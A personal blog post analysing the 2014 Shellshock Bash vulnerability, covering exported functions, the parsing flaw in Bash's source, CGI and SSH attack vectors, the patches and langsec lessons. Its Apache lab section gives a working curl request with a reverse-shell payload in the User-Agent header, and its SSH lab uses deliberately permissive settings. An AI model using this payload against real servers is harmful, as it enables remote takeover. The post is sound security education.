CVE-2014-6271 - Shellshock -

This is the first post in my CVE Analysis blog series. Since this is the first post in this series and I have no prior experience with CVE analysis, I will be writing about Shellshock. This is an old vulnerability in Bash, and there are already many articles and blogs written about it. Therefore, this is not something you would want to read if you are already familiar with this vulnerability, as no novel techniques or previously unknown facts are discussed here. Rather, this is just my attempt to establish a format for writing future posts. And after weeks ~~months~~ of procrastination, I finally finished it. With that disclaimer in place, let’s get started.

Summary

CVE	CVE-2014-6271
Disclosure Date	12 September 2014
Patch Date	24 September 2014
Product	Bash
Advisory	https://nvd.nist.gov/vuln/detail/CVE-2014-6271
Affected Versions	1.03 - 4.3
First Patched Version	4.3-025
Issue/Bug Report	https://seclists.org/oss-sec/2014/q3/650
Reporter(s)	Stephane Chazeles

GNU Bash versions 1.03 through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.”

Exploitation

A quick Google search on how to test if your Bash version is vulnerable to Shellshock will show you a proof of concept like this

env x='() { :;}; echo vulnerable' bash -c 'echo test'

Let’s check one by one what this command means.

Environment Variables

First we have to understand what an environment variable is. An environment variable is a dynamic, named value maintained by the operating system; it is not a feature specific to any shell or to Linux itself. It can be used by other processes to obtain various configurations. For example, in Linux the $HOME environment variable is used to store the location of the home directory of the current user. Bash is simply another process that can read or modify its own environment variables. In Bash we can set our own custom environment using the built-in export command:

export foo='hello world'

Now any child processes spawned by the current Bash instance can access the environment variable named foo. This variable can be referenced by adding a $ at the start of the variable name:

echo $foo
# hello world

We can also set an environment variable for a single program without exporting it:

foo='hello world' program

This will spawn the child process program with the environment variable foo in it. Now you may notice that in the above Shellshock payload they are using the env command to set the environment variable. The env command is a standalone utility designed to manage the environment with more control when launching a process:

# To start the program in a sandboxed environment with no environment variables
env -i program  
# To start the program with the FOO environment variable
env FOO='test' program
# To remove the FOO variable from the environment before running program
env -u FOO program

Function as Environment Variables

So far, we have learned about how to export normal static values as environment variables. In Bash, we can also export shell functions into the environment—a Bash extension that isn’t part of the POSIX standard. These exported functions are only passed to child Bash processes; other programs or non-Bash shells will ignore them. There are several ways to define these variables, including using the export command with the -f flag to say that the given name refers to a Bash function.

hello() { echo "Hello, World"; }
export -f hello
bash -c 'hello' # This will start a new child bash proccess and call the exported hello function
# Hello, World

Using the env command:

env hello='() { echo "Hello, World"; }' bash -c 'hello'
# Hello, World

Or we can simply follow the same FOO='value' program format, without any additional utility program, which will also work:

hello='() { echo "Hello, World"; }' bash -c hello
# Hello, World

Note

The payload

Now that we have covered the essentials, let’s walk through the payload step by step:

env x='() { :;}; echo vulnerable' bash -c 'echo test'

In this command, we define a shell function in the environment variable x and pass it to a new Bash process. Here, : (colon) is a Bash built-in command that does nothing, so x is just an empty function. The crucial point—and the heart of the Shellshock vulnerability—is what comes after the function definition. We don’t stop at the end of the function (}); we append a trailing ; echo vulnerable to it. A vulnerable Bash program, when parsing its environment variables, doesn’t stop at the function’s closing brace—it continues past the semicolon and executes echo vulnerable as a separate command. The important thing is we don’t have to call the function x to invoke this; the extra command runs automatically during parsing.

In a vulnerable Bash version this command will print both “vulnerable” and “test”.

Root Cause Analysis

Now let’s take a look at the Bash source code to see where the vulnerability exists. We will look specifically at the code that is responsible for parsing environment variables. The main function inside the shell.c file calls shell_initialize():

static void shell_initialize () {
[...]

  /* Initialize internal and environment variables.  Don't import shell
     functions from the environment if we are running in privileged or
     restricted mode or if the shell is running setuid. */

#if defined (RESTRICTED_SHELL)
  initialize_shell_variables (shell_environment, privileged_mode||restricted||running_setuid);
#else
  initialize_shell_variables (shell_environment, privileged_mode||running_setuid);
#endif

[...]
}

shell_environment variable contains the environment variables, and it is passed to another function called initialize_shell_variables(env, privmod). privmod tells if Bash is currently running in privileged mode, using the -p flag. This will come later when we discuss the different ways that were used to fix Shellshock. This function is defined inside the variable.c file:

/* Initialize the shell variables from the current environment.
   If PRIVMODE is nonzero, don't import functions from ENV or
   parse $SHELLOPTS. */
void initialize_shell_variables (env, privmode)
     char **env;
     int privmode;
{
[...]

for (string_index = 0; string = env[string_index++]; )
    {
    [...]
    /* If exported function, define it now.  Don't import functions from
	 the environment in privileged mode. */
    if (privmode == 0 && read_but_dont_execute == 0 && 
	    STREQN ("() {", string, 4)) {
		[...]
		// This is where shellshock happens
		parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST);
		[...]
	}

After some string manipulation the environment variables are passed to the parse_and_execute() function. For example, if the environment variable contains a value like:

FOO=() { echo hi; }

Then it will be converted to FOO () { echo hi; }; and this will be stored in temp_string and will be passed to the parse_and_execute() function for execution. Here, the only check done to differentiate an exported function from an exported variable is whether its value starts with () {.

int parse_and_execute (string, from_file, flags)
     char *string;
     const char *from_file;
     int flags;
{
  [...]
  with_input_from_string (string, from_file);

  while (*(bash_input.location.string))
    {
      [...]
      if (parse_command () == 0)
        {
          [...]
          last_result = execute_command_internal
                (command, 0, NO_PIPE, NO_PIPE, bitmap);
          dispose_command (command);
          [...]
        }
      else
        {
          last_result = EXECUTION_FAILURE;
          break;
        }
    }

  [...]
  return (last_result);
}

The way they are trying to add this function to the environment variable is by directly executing it. You can try this by just entering the string FOO () { echo hi; } into a Bash shell and calling FOO:

This is similar to how Bash adds the function to its function table. The above string containing the function definition is treated as an input to the parser, and if it parses successfully, it just executes it using the execute_command_internal() function without any further checks or sanitation. parse_command() doesn’t stop after the function definition. If the string contains trailing commands after the function definition, it will happily parse the entire input, and it will be executed.

Attack Vectors

Now you might wonder how this specific parsing vulnerability in Bash could lead to widespread exploitation—and in most cases that would seem like a reasonable question. But the problem arises when other applications use Bash under the hood to deal with user inputs. We will talk about various such applications shortly.

For a system to be vulnerable to Shellshock, 3 conditions must be met:

The application must set an environment variable with attacker-controlled values.
It must invoke the Bash shell.
And most importantly, the system must be running on a vulnerable version of Bash.

Shortly after the Shellshock vulnerability was found, people started to find more and more applications that came under these exploitable conditions.

Common Gateway Interface (CGI)

The major attack vector of this vulnerability is through CGI-based web servers, which at that time were popular and widely used. CGI is an interface specification for interacting between HTTP requests and programs, which can range from compiled C binaries to Bash scripts. According to the specification, information from the server to the program is carried through something called a meta-variable. The most common implementation of these is through the system’s environment variables. That is, information like HTTP headers, HTTP methods, and other user inputs via request parameters are passed to the program as system environment variables. Then the server starts a new child process of the program with the crafted environment variables. If the program invokes Bash (directly or indirectly), Bash will import and parse all environment variables, which in vulnerable versions could lead to command execution. Web servers like Apache, Microsoft IIS, etc. have support for CGI scripting. We will take a look at Apache in this blog by setting up a Docker container with a vulnerable Bash version. You can check out the lab in my GitHub repo. To enable CGI in Apache, first we need to enable the necessary modules in the httpd.conf file:

LoadModule cgid_module modules/mod_cgid.so

We also need to specify that a particular directory is set aside for CGI programs. Apache will assume that every file in this directory is a CGI program and will try to execute it when that particular program is requested by a client. We can use the ScriptAlias directive in Apache to specify this.

ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/"

With this, whenever the client sends a request like https://test.com/cgi-bin/program.sh, the server will check if the program.sh is present inside the /usr/local/apache2/cgi-bin/ directory, and if it is present, will try to execute it. To permit execution of the programs inside cgi-bin/, we need to explicitly specify that using the Options +ExecCGI directive:

<Directory "/usr/local/apache2/cgi-bin">
    AllowOverride None
    # Enable CGI execution
    Options +ExecCGI
    
    Require all granted
    <IfModule mime_module>
        ForceType application/x-httpd-cgi
    </IfModule>
</Directory>

We also need to tell the server that what files are CGI files. For that we will use the AddHandler directive:

AddHandler cgi-script .sh

For testing purposes, we’ll create a ping.sh script that accepts an IP address from the client, runs ping on it, and returns the output.

#!/usr/bin/bash

IP=$(printf "%s" "$QUERY_STRING" | sed -n 's/^ip=\([^&]*\).*/\1/p')
PING_OUT=$(ping -c 2 -- "$IP")

printf "Content-type: text/html\n\n"
printf "%s" "$PING_OUT"
printf "\n\n"

Note

With this, now we can set up a Docker container for testing. After running Docker, send a request with the Shellshock payload inside the User-Agent.

curl -ik 'http://localhost:8080/cgi-bin/ping.sh?ip=google.com' \
	 -H 'User-Agent: () { :; };/usr/bin/bash -i >& /dev/tcp/172.17.0.1/1234 0>&1'

This works because Apache parses the User-Agent and assigns its value to the HTTP_USER_AGENT environment variable. When the server spawns a new Bash process with these environment variables, our payload will be executed as well.

Secure Shell (SSH)

SSH is a service that can be used to securely access a shell on a remote host. We can use it to log in to a different host and execute commands in that system. You might ask: if SSH itself provides shell access, then what is the purpose of using Shellshock to get a shell? This is a valid question in most cases where SSH is configured to allow full shell access. However, there are instances where the server is configured to restrict users from accessing a normal shell. Instead, it provides a restricted shell, where only specific commands or scripts are allowed to execute as a particular user. The ForceCommand directive in the sshd_config file is used for this purpose. Most commonly this feature is used to run automated tasks when a specific user logs into the machine.

Match user backup_user
	ForceCommand /usr/local/bin/backup.sh
	PermitTTY no

This directive will execute the backup.sh script whenever the backup_user logs in through SSH. backup_user is only there to do the backup, and the PermitTTY no directive ensures that the user does not get full shell access.

There’s also a feature in SSH that allows users to pass environment variables to the system. This also needs some additional configuration in the sshd_config file of the server:

PermitUserEnvironment yes
AcceptEnv USER_ENV

With these, users can pass the USER_ENV environment variable into the server. By default the PermitUserEnvironment is set to no since it can be used to bypass access restrictions in some configurations even without a Shellshock vulnerability. For example, by overwriting environment variables like LD_PRELOAD, LD_LIBRARY_PATH, etc., a user can load malicious shared libraries and overwrite system calls. A safer alternative is to use the AcceptEnv directive, which allows only whitelisted environment variables to be copied into the system.

Now imagine an SSH server that is set up to run a shell script every time a user logs in using the ForceCommand directive, where either the PermitUserEnvironment or AcceptEnv is set. If the server is using a vulnerable Bash version and we know the password of the user, then we can pass a crafted environment variable and pass it to the server using -o SendEnv=VAR. Which will trigger Shellshock and bypass the restriction to get full shell access.

I have created a Docker lab setup to test this, which you can access here in my GitHub. For this lab I created a simple bash script that will just print a welcome message and exit.

#!/usr/bin/env bash

echo "Welcome to my SSH Server"
echo "========================"
echo
echo "Maintenance: "
echo "Unfortunately the server is under maintenance, come back later"
exit

I then added these configurations in the /etc/ssh/sshd_config file:

# Enable root login
PermitRootLogin yes

# Disable TTY access
PermitTTY no

# Allow environment variable
AcceptEnv LANG LC_*

# Command to execute on login.
# There's no Match directive specified, so by default all 
# users will execute this script on login.
ForceCommand /sbin/welcome_script.sh

There are more attack vectors, which we won’t explore in this blog (maybe in the future). I will list some of them here, if you want to explore it yourself:

DHCP
Mail services
Open VPN

Mitigation

The initial patch introduced by the maintainer of Bash didn’t fix the core issue entirely, and people started to find various other related but different parsing bugs. After Shellshock, with the new knowledge that merely having the shell parse arbitrary environment variables is exploitable, people realized that the Bash parser was an attack surface. With this realization people began trying standard techniques like fuzzing to quickly find new vulnerabilities in the parser.

The one quick fix used to fix Shellshock was to disable function export entirely. This was done by adding the -p flag, which makes the process run in privileged mode.

-p  Turn on privileged mode. In this mode, the $ENV and $BASH_ENV files
  are not processed, shell functions are not inherited from the
  environment, and the SHELLOPTS, BASHOPTS, CDPATH, and GLOBIGNORE
  variables, if they appear in the environment, are ignored.  If the
  shell is started with the effective user (group) id not equal to the
  real user (group) id, and the -p option is not supplied, these
  actions are taken and the effective user id is set to the real user
  id.  If the -p option is supplied at startup, the effective user id
  is not reset.  Turning this option off causes the effective user and
  group ids to be set to the real user and group ids.

If you remember from the Root Cause Analysis section, shell functions are only parsed if the privmode variable is set to 0. So this is a valid fix to Shellshock. But more often than not, developers needed this feature, and temporarily disabling function export doesn’t fix the underlying vulnerability.

On September 25, Florian Weimer, a researcher from Red Hat, posted an unofficial patch addressing Shellshock and its variants. In that patch, he addressed the issue and found a general solution to it by only parsing functions if the name starts with a prefix BASH_FUNC_ and ends with a suffix (). Soon people realized that separating shell functions into their own special namespace would fix the underlying issue, and most implementations used this prefix + suffix fix.

Beyond Shellshock

In the wild exploits

Considering the simplicity of the vulnerability, it is surprising that this bug remained hidden for about 25 years, dating back to version 1.03, released in September 1989. A direct follow-up question would be if anyone else knew about this vulnerability and if it was being exploited prior to its public disclosure. As in the case of Shellshock, unlike other similar (in the case of mass exploitation) vulnerabilities like the infamous Heartbleed, which leaves no trace, Shellshock activities can be clearly logged and easily detected. However, we haven’t come across any official evidence or reports of its use in public. Still, we cannot entirely rule out the possibility of in-the-wild exploitation since, if Shellshock gave attackers full system access, they would likely take measures to avoid detection and clear all the logs considering its exploitability. But it is highly unlikely that no mistakes would be made by the attackers that leave behind at least some trace of evidence.

Even if you argue that nation-state threat actors wouldn’t leave any traces behind, they didn’t have such advanced Opsec techniques all the time. Even today nation-states tend to make mistakes and leave traces behind on various attacks. Therefore, it is extremely doubtful that they had such techniques before 2014. And as for the case of finding the Shellshock vulnerability, Stéphane Chazelas himself stated that he did not find the vulnerability by reading Bash source code. No one in their sane mind would think of auditing Bash source code; as Michal Zalewski put it, it wouldn’t be much better than auditing /bin/uname. Even if you knew Bash parses arbitrary environment variables incorrectly, it would take a much greater realization to find out that this incorrect parsing of a shell environment variable poses a significant security risk.

In the end Shellshock is caused due to its ambiguous design and parser implementation choices, as well as its failure to maintain proper separation of code and data. Bash alone cannot be blamed for this; third parties using it for configuration made this subtle parser quirk even more severe. Which brings us to LangSec.

Language theoretic security and mismorphisms

But if you can prove that the input for program A constructs a turing complete grammar you have already lost. You cannot “fix” these bugs, as there is an infinite number of them. You need to fix the parsers and the languages first.

I think this is the right time to mention langsec research. As this paper states, “Mismorphisms—instances where predicates take on different truth values across different interpretations of reality (notably, different actors’ perceptions of reality and the actual reality)—are the source of weird instructions.”

The syntax used to export static variables can also be applied to export shell functions, which the interpreter then parses and executes. This broke the assumption that values in these contexts would be treated purely as data, creating a false sense of security. Third parties like Apache CGI, SSH, etc. began using this feature for managing configurations, which now contains untrusted user inputs, creating a weird machine. Adding to this is the fact that the parser is broken, allowing a user to append arbitrary commands after the function definition, which the parser then executes.

Seen through the langsec lens, much more can be learned about secure software development. Shellshock is a great example of how layering convenient features across components (e.g., Apache -> CGI -> Bash) builds accidental weird machines.

That’s it for today. While researching this one, I found many informative discussions, articles, and research papers. All of them are listed below.

Go through it if you want to learn about the various perspectives and opinions of people on this incident. I especially recommend reading this particular essay, which goes far beyond Shellshock and provides general information as well as various measures to prevent such vulnerabilities in the future.